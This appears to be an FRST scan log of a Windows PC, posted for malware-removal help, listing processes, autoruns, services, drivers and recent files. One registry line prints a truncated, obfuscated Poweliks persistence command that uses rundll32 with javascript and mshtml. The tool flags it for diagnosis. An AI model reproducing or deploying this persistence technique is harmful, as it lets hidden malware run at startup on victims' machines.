(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
() C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\GuardAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\AMT\LMS.exe
() C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Intel Corporation) C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\dataserv.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\vds.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Primax Electronics Ltd.) C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.exe
(D-Link Corp.) C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe
(Wireless Service) C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
() C:\Program Files (x86)\AVG Secure Search\vprot.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\apcsystray.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\System Update\SUService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
() C:\Program Files\Lenovo\Lenovo Mouse Suite\FSRremoS.EXE
(Primax Electronics Ltd.) C:\Program Files\Lenovo\Lenovo Mouse Suite\PELMICED.EXE
() C:\Program Files\Lenovo\Lenovo Mouse Suite\PelElvDm.exe
() C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Daemon for Mouse Suite] => C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.EXE [99840 2010-07-29] (Primax Electronics Ltd.)
HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2013-04-30] (LogMeIn, Inc.)
HKLM-x32\...\Run: [Power Manager Power Agenda] => C:\Program Files (x86)\ThinkPad\Utilities\DPMHost.EXE [75064 2010-07-28] ()
HKLM-x32\...\Run: [Lenovo Registration] => C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe [4351712 2011-07-13] (Lenovo, Inc.)
HKLM-x32\...\Run: [D-Link D-Link DWA-125] => C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe [1024000 2010-05-21] (D-Link Corp.)
HKLM-x32\...\Run: [WZCSLDR2] => C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe [122880 2010-04-21] (Wireless Service)
HKLM-x32\...\Run: [Display] => C:\Program Files (x86)\APC\PowerChute Personal Edition\DataCollectionLauncher.exe [284024 2012-01-24] (Schneider Electric)
HKLM-x32\...\Run: [EaseUs Watch] => C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe [70792 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [EaseUs Tray] => C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe [743560 2011-12-26] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3593744 2014-09-05] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG Secure Search\vprot.exe [2640408 2014-08-26] ()
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1279120 2012-09-27] (CANON INC.)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [452272 2012-08-31] (CANON INC.)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_winlogonx64.dll (Citrix Online, LLC)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-606911418-3109034106-3922174115-1001\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-606911418-3109034106-3922174115-500\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\APC UPS Status.lnk
ShortcutTarget: APC UPS Status.lnk -> C:\Program Files (x86)\APC\PowerChute Personal Edition\Display.exe (Schneider Electric)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/webhp?rls=ig
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexbho.dll (CANON INC.)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files (x86)\AVG\AVG2012\avgssiea.dll No File
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll No File
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO-x32: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files (x86)\AVG\AVG2012\avgssie.dll No File
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexhlp.dll (CANON INC.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll No File
Toolbar: HKCU - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexhlp.dll (CANON INC.)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgppa.dll No File
Handler-x32: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgpp.dll No File
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll (AVG Secure Search)
Tcpip\..\Interfaces\{145F6C64-D76C-4A66-8658-02D842AE2435}: [NameServer] 8.8.8.8,8.8.4.4

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.9\\npsitesafety.dll No File
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll (CANON INC.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [ndibdjnfmopecpmkdieinmbadjfpblof] - C:\ProgramData\AVG Secure Search\ChromeExt\18.1.0.443\avg.crx [2014-04-17]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 APC Data Service; C:\Program Files (x86)\APC\PowerChute Personal Edition\dataserv.exe [21880 2012-01-24] (Schneider Electric)
R2 APC UPS Service; C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe [705912 2012-01-24] (Schneider Electric)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3364368 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [293448 2014-09-05] (AVG Technologies CZ, s.r.o.)
S2 D_Link_DWA-125; C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWZCSdS.exe [126976 2010-04-21] (Wireless Service) [File not signed]
R2 D_Link_DWA-125_WPS; C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe [53248 2010-03-03] () [File not signed]
R2 EaseUS Agent; C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe [61064 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
S2 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_service.exe [610888 2014-09-25] (Citrix Online, LLC)
R2 Guard Agent; C:\Program Files (x86)\EaseUS\Todo Backup\bin\GuardAgent.exe [23176 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [376168 2014-11-03] (LogMeIn, Inc.)
R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [226152 2014-11-03] (LogMeIn, Inc.)
R2 LMS; C:\Program Files (x86)\Intel\AMT\LMS.exe [174616 2009-07-21] (Intel Corporation)
R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2013-04-30] (LogMeIn, Inc.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 PelService; C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe [177152 2010-04-22] () [File not signed]
R2 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [28672 2011-07-25] (Lenovo Group Limited) [File not signed]
R2 ThinkVantage Registry Monitor Service; C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe [1019904 2009-08-28] (Lenovo Group Limited) [File not signed]
S3 TVT Backup Service; C:\Program Files (x86)\Lenovo\Rescue and Recovery\rrservice.exe [1475896 2010-07-29] (Lenovo Group Limited)
R2 UNS; C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2066968 2009-07-21] (Intel Corporation)
S2 vToolbarUpdater18.1.9; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [1820184 2014-08-11] (AVG Secure Search)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 anodlwf; C:\Windows\System32\DRIVERS\anodlwfx.sys [15872 2009-03-06] ()
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [247576 2014-07-24] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123672 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [270616 2014-07-02] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-08-11] (AVG Technologies)
R0 EUBAKUP; C:\Windows\System32\drivers\eubakup.sys [57480 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R0 EUBKMON; C:\Windows\System32\drivers\EUBKMON.sys [51336 2011-12-22] () [File not signed]
R1 EUDSKACS; C:\Windows\system32\drivers\eudskacs.sys [19592 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R1 EUFDDISK; C:\Windows\system32\drivers\EuFdDisk.sys [189576 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-04-30] (LogMeIn, Inc.)
S4 LMIRfsClientNP; No ImagePath
R1 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [93400 2014-10-01] (Malwarebytes Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-05] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
S3 netr28ux; C:\Windows\System32\DRIVERS\Dnetr28ux.sys [1119072 2010-05-05] (Ralink Technology Corp.)
R3 pelmouse; C:\Windows\System32\DRIVERS\pelmouse.sys [23040 2010-10-20] (TPMX Electronics Ltd.)
R3 pelusblf; C:\Windows\System32\DRIVERS\pelusblf.sys [33280 2010-12-22] (TPMX Electronics Ltd.)
R1 Serial; C:\Windows\System32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-11-03] ()
R3 TVTI2C; C:\Windows\System32\DRIVERS\Tvti2c.sys [41536 2009-07-02] (Lenovo (United States) Inc.)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-03 21:16 - 2014-11-03 21:16 - 00004669 _____ () C:\Users\Deborah\Downloads\RKreport_SCN_11032014_211524.log
2014-11-03 21:10 - 2014-11-03 21:10 - 14670424 _____ () C:\Users\Deborah\Downloads\RogueKiller.exe
2014-11-03 21:10 - 2014-11-03 21:10 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-11-03 21:10 - 2014-11-03 21:10 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-11-02 15:12 - 2014-11-02 15:12 - 00000000 ____D () C:\Users\Deborah\Downloads\FRST-OlderVersion
2014-10-31 06:49 - 2014-10-31 06:49 - 05591672 _____ (Swearware) C:\Users\Deborah\Downloads\ComboFix.exe
2014-10-31 06:33 - 2014-10-31 06:33 - 00018772 _____ () C:\Users\Deborah\Downloads\DDS.txt
2014-10-31 06:33 - 2014-10-31 06:33 - 00005354 _____ () C:\Users\Deborah\Downloads\Attach.txt
2014-10-31 06:32 - 2014-10-31 06:32 - 00018772 _____ () C:\Users\Deborah\Desktop\dds.txt
2014-10-31 06:32 - 2014-10-31 06:32 - 00005354 _____ () C:\Users\Deborah\Desktop\attach.txt
2014-10-31 06:18 - 2014-10-31 06:18 - 00688992 ____R (Swearware) C:\Users\Deborah\Downloads\dds.com
2014-10-31 05:55 - 2014-11-02 22:17 - 00027584 _____ () C:\Users\Deborah\Downloads\Addition.txt
2014-10-31 05:52 - 2014-11-05 10:40 - 00018594 _____ () C:\Users\Deborah\Downloads\FRST.txt
2014-10-31 05:50 - 2014-11-05 10:40 - 00000000 ____D () C:\FRST
2014-10-31 05:50 - 2014-11-02 15:12 - 02114560 _____ (Farbar) C:\Users\Deborah\Downloads\FRST64.exe
2014-10-31 05:27 - 2014-10-31 05:27 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-31 05:25 - 2014-10-31 05:25 - 29458856 _____ (Oracle Corporation) C:\Users\Deborah\Downloads\jre-7u71-windows-i586.com
2014-10-31 05:24 - 2014-10-31 05:24 - 29727656 _____ (Oracle Corporation) C:\Users\Deborah\Downloads\jre-8u25-windows-i586.com
2014-10-31 04:59 - 2014-11-03 18:47 - 00029324 _____ () C:\Windows\PFRO.log
2014-10-31 04:15 - 2010-08-30 07:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-10-31 04:12 - 2014-10-31 04:16 - 00000000 ____D () C:\AdwCleaner
2014-10-30 20:00 - 2014-10-30 20:00 - 01375089 _____ () C:\Users\Deborah\Downloads\adwcleaner_3.311.exe
2014-10-29 15:01 - 2014-11-03 18:52 - 00000336 _____ () C:\Windows\setupact.log
2014-10-29 15:01 - 2014-10-29 15:01 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-27 12:12 - 2014-10-27 12:12 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Deborah\Downloads\tdsskiller.exe
2014-10-22 09:46 - 2014-10-22 09:46 - 00000028 _____ () C:\Windows\SysWOW64\u
2014-10-21 09:54 - 2014-10-21 09:54 - 00000000 ____D () C:\Users\Deborah\AppData\Roaming\AVG2015
2014-10-21 09:51 - 2014-10-21 09:53 - 00000000 ____D () C:\ProgramData\AVG2015
2014-10-21 09:51 - 2014-10-21 09:51 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Avg
2014-10-21 09:46 - 2014-10-21 09:59 - 00000000 ____D () C:\Users\Deborah\AppData\Local\Avg2015
2014-10-15 13:53 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 13:53 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 13:53 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 13:53 - 2014-08-18 22:11 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-15 13:53 - 2014-08-18 22:10 - 00616352 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-15 13:53 - 2014-08-18 22:08 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-15 13:53 - 2014-08-18 22:08 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 13:53 - 2014-08-18 22:08 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2014-10-15 13:53 - 2014-08-18 22:07 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 13:53 - 2014-08-18 22:07 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00032256 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 13:53 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-15 13:53 - 2014-08-18 21:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2014-10-15 13:53 - 2014-08-18 21:06 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 13:53 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 13:53 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 13:53 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 05551032 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 13:53 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 13:53 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 13:53 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
